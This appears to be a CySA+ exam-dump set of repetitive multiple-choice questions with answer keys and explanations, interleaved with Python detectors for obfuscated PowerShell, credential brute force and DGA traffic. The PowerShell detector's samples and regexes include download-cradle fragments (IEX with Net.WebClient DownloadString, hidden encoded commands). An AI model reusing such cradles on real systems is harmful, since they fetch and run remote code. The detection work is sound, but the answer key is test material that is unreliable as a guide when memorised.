CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 8 Q141-160


Question 141

A SOC analyst notices multiple failed login attempts targeting several administrative accounts from external IP addresses. The attempts are rapid and use variations of common usernames. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The described scenario indicates a classic brute-force attack targeting user credentials. Brute-force attacks involve systematically attempting combinations of usernames and passwords until a valid set is discovered. The high frequency of login failures across multiple administrative accounts, especially using variations of usernames, is indicative of automated tools attempting to gain unauthorized access.

Attackers often leverage botnets to distribute login attempts across multiple IP addresses, evading traditional IP-based blocking. These attacks are automated, enabling thousands of attempts in minutes, which allows threat actors to potentially compromise accounts with weak or reused passwords. Monitoring for patterns such as repeated failed logins, geographical anomalies, and unusual login times is crucial for detection.

Mitigation involves implementing account lockout policies that temporarily disable accounts after a threshold of failed attempts. Multi-factor authentication (MFA) is highly effective in preventing unauthorized access even if passwords are compromised, requiring an additional authentication factor. Rate limiting and anomaly detection on authentication endpoints help identify brute-force campaigns in progress.

Log aggregation and correlation through SIEM solutions allow analysts to detect distributed patterns of attacks that might otherwise go unnoticed on individual systems. Organizations should also enforce strong password policies, regular password rotation, and user training on credential hygiene. Threat intelligence can provide information on IP addresses known for brute-force campaigns, enabling proactive blocking and monitoring.

B Fileless malware using living-off-the-land techniques

Fileless malware operates primarily in memory, often leveraging legitimate system tools. It does not produce repeated failed login attempts and is distinct from credential brute-forcing.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm system resources to disrupt service availability. They do not involve repeated credential testing or systematic login attempts across accounts.

D Phishing emails delivering malicious attachments

Phishing campaigns may deliver malware or steal credentials but rely on user interaction rather than automated login attempts across multiple endpoints.

Question 142

An analyst identifies a surge in DNS queries to pseudo-randomly generated domains combined with outbound traffic to unknown IP addresses over non-standard ports. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of high-volume DNS queries to pseudo-random domains and outbound traffic to unknown IP addresses over uncommon ports strongly indicates malware utilizing a domain generation algorithm (DGA) for command-and-control (C2) operations. DGAs allow malware to maintain resilient communication with C2 infrastructure while evading traditional defenses like blacklists or signature-based detection.

DGAs generate a set of domain names algorithmically, enabling malware to connect to C2 servers even if some domains are blocked or taken down. This technique ensures persistence and stealth, allowing attackers to issue commands, exfiltrate data, and maintain long-term control over compromised systems. High-entropy domain names and unusual connection patterns are key indicators of DGA activity.

Detection requires correlating DNS logs with network traffic. Analysts look for repeated queries to high-entropy or randomized domains and connections over uncommon ports. Behavioral monitoring, endpoint detection and response (EDR), and machine learning-based anomaly detection improve the identification of DGA-based malware. Reverse-engineering DGAs enables prediction and preemptive blocking of future domains.

Mitigation involves isolating affected endpoints, blocking known malicious domains, removing malware, and conducting forensic investigations. Threat intelligence integration provides knowledge of known DGA malware families, associated indicators of compromise (IOCs), and relevant attack techniques. Defense-in-depth strategies, including network segmentation, strict egress filtering, application whitelisting, and user training, enhance protection against DGA-enabled malware.

B Routine software update traffic

Software updates communicate with known servers over standard ports and predictable domains. Randomized domains and high-volume queries are inconsistent with normal updates.

C Distributed denial-of-service (DDoS) attack

DDoS attacks overwhelm systems to disrupt availability but do not establish covert communication with pseudo-random domains or C2 servers.

D Misconfigured internal monitoring system

While misconfigurations can generate abnormal traffic, they rarely produce high-frequency queries to pseudo-random domains combined with outbound connections over unusual ports.

Question 143

A security audit reveals multiple privileged accounts that have not been used in over six months. Which control would MOST effectively reduce associated risks?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts represent a significant attack vector. Attackers may exploit inactive accounts to gain unauthorized access, maintain persistence, or perform lateral movement within the network. Automated account deprovisioning systematically disables or removes accounts after a defined inactivity period, enforcing least privilege and reducing the attack surface.

Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and regulatory compliance (e.g., PCI DSS, HIPAA, SOX). Manual deprovisioning is prone to human error and may overlook dormant accounts, leaving potential vulnerabilities. Automated processes ensure timely removal and consistency across all systems.

Complementary measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Monitoring attempts to access disabled accounts provides early detection of potential insider threats or compromised credentials.

B Increase password complexity requirements for service accounts

Strong passwords reduce brute-force attack risks but do not address dormant accounts retaining administrative privileges.

C Disable all external SSH access

SSH restrictions reduce certain attack vectors but do not mitigate risks associated with inactive accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not mitigate threats related to dormant administrative accounts.

Question 144

During a penetration test, testers exploit unsanitized web input fields, allowing OS-level command execution. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when applications fail to validate input, allowing attackers to execute arbitrary OS commands. Server-side validation ensures all input meets expected patterns, types, and lengths, while parameterized commands separate user input from executable code.

Secure coding practices, including input validation, output encoding, and adherence to secure frameworks, are essential to mitigate injection attacks. Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities before deployment. Web application firewalls (WAFs) provide an additional layer of protection by blocking malicious requests.

Monitoring anomalous input behavior and logging input validation failures support early detection. Remediation includes code updates, secure coding training, and regular penetration tests. TLS encrypts communications but does not prevent injection. Session timeouts mitigate session hijacking but not injection. Firewalls cannot inspect application input, making input validation the primary control.

B Enforce TLS encryption for all web traffic

TLS secures communication but does not address input validation vulnerabilities.

C Increase session timeout values

Session timeouts mitigate hijacking but do not prevent command injection.

D Add additional firewall rules at the perimeter

Firewalls control network traffic but cannot mitigate application-layer input vulnerabilities effectively.

Question 145

A SOC analyst detects obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, using legitimate tools like PowerShell, WMI, or Office macros to execute malicious actions. Obfuscated scripts communicating externally without leaving artifacts on disk indicate living-off-the-land (LotL) techniques. These attacks bypass traditional signature-based antivirus detection by operating in volatile memory.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include abnormal script execution, outbound traffic to unknown IPs, and deviations from normal behavior. Effective mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts, and performing remediation.

Preventive measures include enforcing least privilege, PowerShell logging, script block logging, execution policies, application whitelisting, and integrating threat intelligence to block malicious domains. A defense-in-depth approach combining monitoring, anomaly detection, user training, and structured incident response is essential.

Fileless malware differs from ransomware, phishing, and DDoS attacks in that it operates without creating traditional files, leveraging legitimate tools and memory-resident code to evade detection.

Question 146

A SOC analyst observes repeated login failures targeting multiple accounts from several external IP addresses. The usernames follow predictable patterns, and attempts occur at a high frequency. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The scenario described is indicative of a brute-force attack, where an adversary attempts to systematically guess passwords to gain unauthorized access to accounts. The high frequency of login failures across multiple accounts, combined with predictable username patterns, points to automated credential attacks rather than human error or benign system behavior.

Brute-force attacks can be carried out manually, but attackers often leverage automated tools and botnets to increase the speed and scale of their attacks. These attacks are typically distributed across multiple IP addresses to avoid detection and circumvent IP-based blocking mechanisms. Attackers may target weak or reused passwords, as well as default administrative credentials that are often overlooked by system administrators.

Detection and mitigation require a multi-layered approach. Account lockout policies can prevent repeated login attempts by temporarily disabling accounts after a threshold number of failures. Multi-factor authentication (MFA) provides an additional layer of protection, requiring a second authentication factor, such as a one-time passcode or biometric verification, which significantly reduces the risk of compromise even if passwords are discovered.

Monitoring and correlating authentication logs through SIEM solutions allows analysts to detect patterns of brute-force attacks. Advanced analytics, including machine learning models, can identify unusual login behaviors and generate alerts. Rate-limiting login attempts at the application or network level slows attack progress and gives security teams time to respond.

User education on password hygiene, regular password rotation policies, and enforcing strong password requirements are critical preventive measures. Threat intelligence feeds can help identify known attacker IP addresses and credential attack campaigns, enabling proactive blocking and enhanced monitoring.

B Fileless malware using living-off-the-land techniques

Fileless malware operates primarily in memory and leverages legitimate system tools like PowerShell or WMI. While it can perform malicious actions, it does not manifest as repeated login failures targeting multiple accounts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm system resources to disrupt service availability. They do not involve systematic testing of credentials or repeated failed login attempts.

D Phishing emails delivering malicious attachments

Phishing attacks require user interaction to deliver malicious payloads or steal credentials. Automated login attempts across multiple accounts are inconsistent with typical phishing activity.

Effective response includes isolating potentially affected accounts, resetting compromised passwords, monitoring authentication logs, enforcing MFA, and blocking suspicious IP addresses. Continuous monitoring, threat intelligence integration, and layered defense strategies reduce the risk of successful credential compromise.

Question 147

An analyst observes unusual outbound network traffic from a host to multiple external IP addresses over non-standard ports. DNS logs indicate high-frequency queries to randomized domains. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of outbound connections over non-standard ports and high-frequency DNS queries to randomized domains is characteristic of malware employing a domain generation algorithm (DGA) to maintain resilient communication with command-and-control (C2) servers. DGAs dynamically generate a set of pseudo-random domain names at specific intervals, enabling malware to evade detection mechanisms, such as static blacklists or traditional signature-based defenses.

DGAs are commonly associated with sophisticated malware families, including advanced persistent threat (APT) actors, as they enable persistent and stealthy communication. By generating new domains periodically, malware can circumvent domain takedowns and maintain command and control even in dynamic network environments. Detection relies on analyzing DNS and network traffic for unusual query volumes, high-entropy domain names, repeated failed resolutions, and outbound connections to uncommon ports.

Mitigation involves isolating affected endpoints, blocking malicious domains and IPs, and performing malware eradication procedures. Reverse-engineering the DGA can predict future domain names for preemptive blocking. Integration with threat intelligence feeds helps identify malware families, algorithms, and indicators of compromise (IOCs).

Behavioral monitoring and endpoint detection and response (EDR) systems improve visibility into memory-resident malware or fileless threats. Defense-in-depth strategies, including network segmentation, strict egress filtering, application whitelisting, and user education, enhance protection against DGA-based malware.

B Routine software update traffic

Legitimate software updates communicate with known servers using standard ports and predictable domains. Randomized domain queries and connections over unusual ports are inconsistent with update traffic.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm resources and disrupt availability, not maintain covert communication with external domains.

D Misconfigured internal monitoring system

While misconfigurations may generate abnormal traffic, they rarely produce pseudo-random DNS queries and outbound connections to non-standard ports.

Question 148

A security audit identifies privileged accounts that have not been used for over six months but retain administrative privileges. Which control would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts are high-risk targets for attackers seeking unauthorized access. Automated account deprovisioning systematically disables or removes accounts after a predefined period of inactivity, reducing the attack surface. This aligns with the principle of least privilege by ensuring administrative access is granted only when necessary.

Integration with identity governance and privileged access management (PAM) systems ensures consistent enforcement, auditing, and compliance with regulatory standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to oversight and human error, whereas automation ensures dormant accounts are consistently addressed.

Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), privilege recertification, and continuous monitoring of account activity. Monitoring attempts to access deprovisioned accounts can detect insider threats or attempted credential misuse. Automated deprovisioning improves operational efficiency and reduces the likelihood of dormant accounts being exploited by malicious actors.

B Increase password complexity requirements for service accounts

While complex passwords reduce brute-force risks, they do not address the inherent risk posed by dormant privileged accounts.

C Disable all external SSH access

Restricting SSH access mitigates external threats but does not address risks from unused accounts.

D Deploy full disk encryption on endpoints

Full disk encryption protects data at rest but does not prevent misuse of privileged accounts.

Question 149

During a penetration test, testers exploit unsanitized web application input fields that allow OS-level command execution. Which control BEST mitigates this vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when applications fail to properly validate user input, allowing malicious commands to be executed at the OS level. Server-side input validation ensures that all input is checked against expected patterns, types, and lengths, preventing execution of arbitrary commands. Parameterized commands or prepared statements further isolate user input from executable code, effectively neutralizing injection attacks.

Secure coding practices, including input validation, output encoding, and adherence to secure frameworks, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify issues during development. Web application firewalls (WAFs) provide an additional layer by blocking known attack signatures.

Monitoring anomalous input attempts and logging validation failures enhances detection. Remediation includes code updates, developer training, and penetration testing. TLS encryption secures communication but does not prevent injection. Session timeouts protect sessions but not input validation. Firewall rules cannot inspect application input effectively, making server-side validation with parameterized commands the primary control.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not mitigate command injection vulnerabilities.

C Increase session timeout values

Session timeouts address session hijacking but do not prevent command injection.

D Add additional firewall rules at the perimeter

Firewalls provide network-level filtering but cannot prevent attacks targeting application input vulnerabilities.

Question 150

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints that communicate with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory and utilizes legitimate system tools, such as PowerShell, WMI, or macros, to execute malicious actions. Obfuscated scripts communicating externally without creating files on disk are indicative of living-off-the-land (LotL) malware, which evades traditional signature-based antivirus.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include unusual script execution, outbound connections to unknown IPs, and deviations from baseline behavior. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts, and remediating systems.

Preventive measures include enforcing least privilege, application whitelisting, PowerShell script logging, script block logging, execution policy enforcement, and integrating threat intelligence to block malicious domains. A defense-in-depth strategy combining monitoring, anomaly detection, user training, and structured incident response is essential for addressing fileless malware threats.

Fileless malware differs from ransomware, phishing, and DDoS attacks because it operates without traditional files, leveraging memory-resident execution and legitimate tools for persistence and evasion.
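The script block logging and obfuscation indicators mentioned in the explanations for Questions 145 and 150 can be turned into a triage rule. The Python below is an added illustration, not part of the exam material or of any vendor tool; the sample script-block records, the indicator patterns and their weights are constructed assumptions, and the encoded sample is generated at runtime so it is guaranteed to decode to the harmless command shown.

```python
import base64
import re

# Constructed script-block records of the kind PowerShell script block logging
# (Event ID 4104) produces. Not real telemetry. The encoded sample is built at
# runtime so its base64 decodes to exactly "Write-Output 'hi'".
ENCODED_SAMPLE = base64.b64encode("Write-Output 'hi'".encode("utf-16-le")).decode()
SAMPLE_BLOCKS = [
    {"host": "WS-101",   # routine administration, should score low
     "text": "Get-Service -Name Spooler | Restart-Service; Get-EventLog -LogName System -Newest 20"},
    {"host": "WS-117",   # string splitting, backtick insertion, IEX, download cradle
     "text": "$a='Wr'+'ite-Ou'+'tput';I`E`X ($a+' test') ; (New-Object Net.WebClient).DownloadString($u)"},
    {"host": "WS-118",   # hidden window, no profile, encoded command
     "text": "powershell.exe -nop -w hidden -EncodedCommand " + ENCODED_SAMPLE},
]

# (name, pattern, weight). Weights are assumptions for this demo; tune against your baseline.
INDICATORS = [
    ("invoke_expression", r"\bI`?E`?X\b|Invoke-Expression", 3),
    ("encoded_command",   r"-(?:e|ec|enc|encodedcommand)\b", 2),
    ("hidden_window",     r"-w(?:indowstyle)?\s+hidden\b", 2),
    ("no_profile",        r"-nop\b|-noprofile\b", 1),
    ("download_cradle",   r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b|FromBase64String", 2),
    ("tick_in_token",     r"[A-Za-z]`[A-Za-z]", 2),
    ("string_splitting",  r"'[^']{1,6}'\s*\+\s*'", 2),
]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SUSPICIOUS_SCORE = 5


def decode_encoded_command(text):
    """Return the UTF-16LE command behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def symbol_ratio(text):
    """Share of non-alphanumeric characters among the non-whitespace characters."""
    chars = [c for c in text if not c.isspace()]
    return sum(1 for c in chars if not c.isalnum()) / len(chars) if chars else 0.0


def score_script_block(text):
    """Unwrap one encoding layer, then add the weight of every indicator present."""
    decoded = decode_encoded_command(text)
    analyzed = text + ("\n" + decoded if decoded else "")
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, analyzed, re.IGNORECASE)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if symbol_ratio(analyzed) > 0.35:   # heavy punctuation is itself a weak signal
        hits.append("symbol_heavy")
        score += 1
    return {"score": score, "hits": hits, "decoded": decoded,
            "suspicious": score >= SUSPICIOUS_SCORE}


def triage(blocks):
    """Score every record and keep the host so an analyst can pivot to the endpoint."""
    return [{"host": b["host"], **score_script_block(b["text"])} for b in blocks]


if __name__ == "__main__":
    for r in triage(SAMPLE_BLOCKS):
        print(r["host"], r["score"], r["suspicious"], r["hits"], r["decoded"])
```
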

Question 151

A SOC analyst identifies a large number of failed login attempts across multiple administrative accounts originating from external IP addresses. The usernames follow predictable patterns, and the login attempts are occurring at a high frequency. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The described scenario is indicative of a brute-force attack targeting user credentials. Brute-force attacks involve systematically trying large numbers of possible username and password combinations to gain unauthorized access to accounts. The rapid frequency of login failures, particularly targeting administrative accounts, along with predictable username patterns, suggests automated tools or scripts are being used rather than human error.

Attackers often leverage distributed botnets to perform brute-force attacks from multiple IP addresses, making it difficult to block using simple IP-based rules. These attacks aim to compromise weak or reused passwords, exploiting accounts that lack multi-factor authentication (MFA). Brute-force attacks can lead to privilege escalation, data theft, and the potential deployment of malware across compromised systems.

Detection and mitigation require a multi-layered approach. Account lockout policies temporarily disable accounts after a threshold number of failed login attempts, reducing the efficacy of automated brute-force tools. Implementing MFA ensures that even if passwords are compromised, an additional authentication factor, such as a time-based one-time password or biometric factor, is required, mitigating unauthorized access risk.

Monitoring failed login attempts across the environment using SIEM solutions or centralized logging allows analysts to identify patterns indicative of brute-force attacks. Machine learning-based anomaly detection can highlight unusual login patterns, such as multiple failures from disparate geolocations. Rate limiting on authentication endpoints slows the attack process, providing additional time for security response.

Complementary measures include enforcing strong password policies, regular password rotation, and user education on credential hygiene. Threat intelligence feeds can help identify known attacker IPs and campaigns, enabling proactive defense and blocking measures.

B Fileless malware using living-off-the-land techniques

Fileless malware primarily resides in memory, leveraging legitimate system tools for execution. While it can perform malicious actions, it does not manifest as repeated failed login attempts across multiple accounts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm system resources to disrupt service availability. They do not involve systematic credential testing or repeated failed login attempts targeting accounts.

D Phishing emails delivering malicious attachments

Phishing campaigns deliver malware or attempt to steal credentials through user interaction. Automated login attempts across multiple accounts do not match typical phishing patterns.

Effective response includes isolating potentially compromised accounts, enforcing MFA, monitoring authentication logs, blocking suspicious IPs, and performing forensic investigations to ensure no accounts have been compromised. Continuous monitoring and layered security measures are essential to reduce the likelihood of successful credential compromise.
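The detection approach described in the explanations for Questions 141, 146 and 151 (failure thresholds, lockout, distributed sources, predictable privileged usernames) as working code. This is an added example, not from the exam material; the sshd-style log format, the 60-second window, the thresholds and the "privileged-looking" username pattern are assumptions.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Constructed sshd-style authentication events (TEST-NET addresses, made-up users).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z auth sshd: Failed password for admin from 203.0.113.10 port 51000
2024-05-01T10:00:02Z auth sshd: Failed password for administrator from 203.0.113.11 port 51001
2024-05-01T10:00:02Z auth sshd: Failed password for admin1 from 203.0.113.12 port 51002
2024-05-01T10:00:03Z auth sshd: Failed password for root from 203.0.113.10 port 51003
2024-05-01T10:00:04Z auth sshd: Failed password for sysadmin from 203.0.113.13 port 51004
2024-05-01T10:00:05Z auth sshd: Failed password for admin from 203.0.113.11 port 51005
2024-05-01T10:00:06Z auth sshd: Failed password for Administrator from 203.0.113.12 port 51006
2024-05-01T10:00:07Z auth sshd: Failed password for admin from 203.0.113.14 port 51007
2024-05-01T10:00:08Z auth sshd: Failed password for adm1n from 203.0.113.10 port 51008
2024-05-01T10:00:09Z auth sshd: Failed password for root from 203.0.113.11 port 51009
2024-05-01T10:00:10Z auth sshd: Accepted password for admin from 203.0.113.14 port 51010
2024-05-01T10:15:00Z auth sshd: Failed password for jsmith from 198.51.100.7 port 40000
2024-05-01T10:25:00Z auth sshd: Failed password for jsmith from 198.51.100.7 port 40001
2024-05-01T10:25:30Z auth sshd: Accepted password for jsmith from 198.51.100.7 port 40002
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth sshd: (?P<result>Failed|Accepted) password for "
    r"(?P<user>\S+) from (?P<src>\S+) port \d+$"
)
# Usernames that look privileged or default; an assumption for this demo.
ADMIN_LIKE = re.compile(r"adm|root|sys", re.IGNORECASE)


def parse_events(text):
    """Parse log lines into time-sorted event dicts; lines that are not auth results are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "ok": m["result"] == "Accepted",
            "user": m["user"].lower(),  # 'Administrator' and 'administrator' are one target
            "src": m["src"],
        })
    events.sort(key=lambda e: e["ts"])
    return events


def _window_state(recent, campaign_failures, min_accounts, min_sources):
    """Accounts and sources failing inside the window, and whether that looks like a campaign."""
    accounts = {f["user"] for f in recent}
    sources = {f["src"] for f in recent}
    active = (len(recent) >= campaign_failures and len(accounts) >= min_accounts
              and len(sources) >= min_sources)
    return accounts, sources, active


def detect_bruteforce(events, window=timedelta(seconds=60), campaign_failures=8,
                      min_accounts=3, min_sources=3, lockout_failures=3):
    """Sliding-window detection producing three alert kinds:
    campaign               - many failures spread over several accounts and source IPs
    lockout                - one account crossed the lockout threshold inside the window
    success_after_campaign - a login succeeded for an attacked account from an attacking IP
                             while the campaign was active (highest priority)
    """
    recent = deque()   # failures still inside the window
    locked = set()
    alerts = []
    campaign_open = False
    for ev in events:
        while recent and ev["ts"] - recent[0]["ts"] > window:
            recent.popleft()
        if not ev["ok"]:
            recent.append(ev)
        accounts, sources, active = _window_state(recent, campaign_failures,
                                                  min_accounts, min_sources)
        if ev["ok"]:
            if active and ev["user"] in accounts and ev["src"] in sources:
                alerts.append({"kind": "success_after_campaign", "ts": ev["ts"],
                               "user": ev["user"], "src": ev["src"]})
            continue
        if active and not campaign_open:   # alert once per contiguous campaign
            alerts.append({"kind": "campaign", "ts": ev["ts"], "failures": len(recent),
                           "accounts": sorted(accounts), "sources": sorted(sources),
                           "privileged_targets": sorted(a for a in accounts if ADMIN_LIKE.search(a))})
        campaign_open = active
        per_user = sum(1 for f in recent if f["user"] == ev["user"])
        if per_user >= lockout_failures and ev["user"] not in locked:
            locked.add(ev["user"])
            alerts.append({"kind": "lockout", "ts": ev["ts"], "user": ev["user"],
                           "failures": per_user})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_LOG)):
        print(alert)
```

The two spaced-out jsmith failures followed by a success never trigger anything, which is the behaviour a lockout threshold alone would get wrong if it counted across the whole day.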

Question 152

An analyst detects unusual outbound network traffic from a host to multiple unknown external IP addresses over high-numbered ports. DNS logs reveal frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of high-volume DNS queries to pseudo-random domains and outbound connections to unknown IPs over non-standard ports is characteristic of malware employing a domain generation algorithm (DGA). DGAs are used to dynamically generate domain names for command-and-control (C2) communications, enabling malware to evade detection and maintain persistent communication channels.

DGAs are particularly effective against security mechanisms that rely on static blacklists, as the malware can generate new domains that have not been blocked or detected. High-entropy domain names, unusual query volumes, repeated failed resolutions, and outbound connections over uncommon ports are key indicators of DGA activity. Advanced persistent threat (APT) actors frequently leverage DGAs to maintain stealthy and resilient control of compromised systems.

Detection involves correlating DNS logs with network telemetry. Behavioral analysis, endpoint detection and response (EDR), and machine learning-based anomaly detection can identify high-entropy domain queries and unusual network traffic patterns. Reverse-engineering the DGA algorithm allows prediction of future domains and preemptive blocking.

Mitigation strategies include isolating affected endpoints, blocking malicious domains and IP addresses, conducting forensic investigations, and removing malware. Integration with threat intelligence feeds enables identification of known DGA malware families, associated IOCs, and attack techniques. Defense-in-depth strategies, such as network segmentation, strict egress filtering, application whitelisting, and user awareness training, improve resilience against DGA-enabled malware.

B Routine software update traffic

Software updates communicate with predictable, known servers and standard ports. Randomized domains and high-frequency queries are inconsistent with legitimate update activity.

C Distributed denial-of-service (DDoS) attack

DDoS attacks overwhelm target systems to degrade service availability. They do not establish covert communication channels using pseudo-random domains.

D Misconfigured internal monitoring system

While misconfigurations can generate abnormal traffic, they rarely result in high-frequency queries to pseudo-random domains coupled with outbound connections over unusual ports.
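The DNS-to-network correlation described in the explanations for Questions 142, 147 and 152 (high-entropy names, repeated failed resolutions, outbound connections on uncommon ports) implemented as an added example; it is not part of the exam material. The resolver and connection log formats, the thresholds, the list of common ports and the naive second-level-domain extraction are assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log lines: client, queried name, rcode, answer ('-' if none).
DNS_LOG = """\
10.0.0.5 kx7qz3vmp9a.com NXDOMAIN -
10.0.0.5 q8w2lfnd0sy.net NXDOMAIN -
10.0.0.5 zp4vh1uoc6rk.info NXDOMAIN -
10.0.0.5 b9tmx3yqa7w.com NXDOMAIN -
10.0.0.5 rf6cjl2ne8dv.com NOERROR 198.51.100.23
10.0.0.5 v3gtq9lzk1hx.net NXDOMAIN -
10.0.0.7 www.example.com NOERROR 93.184.216.34
10.0.0.7 update.example.org NOERROR 203.0.113.5
10.0.0.7 mail.example.com NOERROR 93.184.216.35
"""
# Constructed connection log lines: source, destination, destination port.
CONN_LOG = """\
10.0.0.5 198.51.100.23 443
10.0.0.5 198.51.100.23 17001
10.0.0.7 93.184.216.34 443
10.0.0.7 203.0.113.5 443
"""
COMMON_PORTS = {25, 53, 80, 110, 143, 443, 465, 587, 993, 995}


def shannon_entropy(s):
    """Bits per character: 'aaaa' -> 0.0, 'abcd' -> 2.0; random-looking labels score high."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def sld(name):
    """Second-level label ('update.example.org' -> 'example'); public suffixes such as
    'co.uk' are deliberately not handled in this demo."""
    labels = name.rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def profile_clients(dns_text):
    """Per client: query volume, NXDOMAIN ratio, mean SLD entropy, SLD diversity, resolved IPs."""
    raw = defaultdict(lambda: {"n": 0, "nx": 0, "ent": 0.0, "slds": set(), "resolved": {}})
    for line in dns_text.splitlines():
        client, name, rcode, answer = line.split()
        p = raw[client]
        p["n"] += 1
        p["nx"] += rcode == "NXDOMAIN"
        p["ent"] += shannon_entropy(sld(name))
        p["slds"].add(sld(name))
        if answer != "-":
            p["resolved"][answer] = name   # remember which name produced each IP
    return {c: {"queries": p["n"], "nxdomain_ratio": p["nx"] / p["n"],
                "entropy_mean": p["ent"] / p["n"], "distinct_ratio": len(p["slds"]) / p["n"],
                "resolved": p["resolved"]} for c, p in raw.items()}


def flag_dga_clients(profiles, min_queries=5, entropy_min=3.0, nx_min=0.5, distinct_min=0.8):
    """High-entropy names AND (mostly failed resolutions OR a new SLD on almost every query).
    Returns {client: [reasons]}."""
    flagged = {}
    for client, p in profiles.items():
        if p["queries"] < min_queries or p["entropy_mean"] < entropy_min:
            continue
        reasons = ["high_entropy"]
        if p["nxdomain_ratio"] >= nx_min:
            reasons.append("nxdomain_ratio")
        if p["distinct_ratio"] >= distinct_min:
            reasons.append("distinct_slds")
        if len(reasons) > 1:
            flagged[client] = reasons
    return flagged


def correlate_connections(flagged, profiles, conn_text):
    """Outbound connections from flagged clients on non-standard ports to IPs returned by
    their DGA-like lookups: the likely C2 channel and the first thing to block."""
    alerts = []
    for line in conn_text.splitlines():
        src, dst, port = line.split()
        port = int(port)
        if src in flagged and port not in COMMON_PORTS and dst in profiles[src]["resolved"]:
            alerts.append({"client": src, "dst": dst, "dst_port": port,
                           "domain": profiles[src]["resolved"][dst], "reasons": flagged[src]})
    return alerts


if __name__ == "__main__":
    prof = profile_clients(DNS_LOG)
    for alert in correlate_connections(flag_dga_clients(prof), prof, CONN_LOG):
        print(alert)
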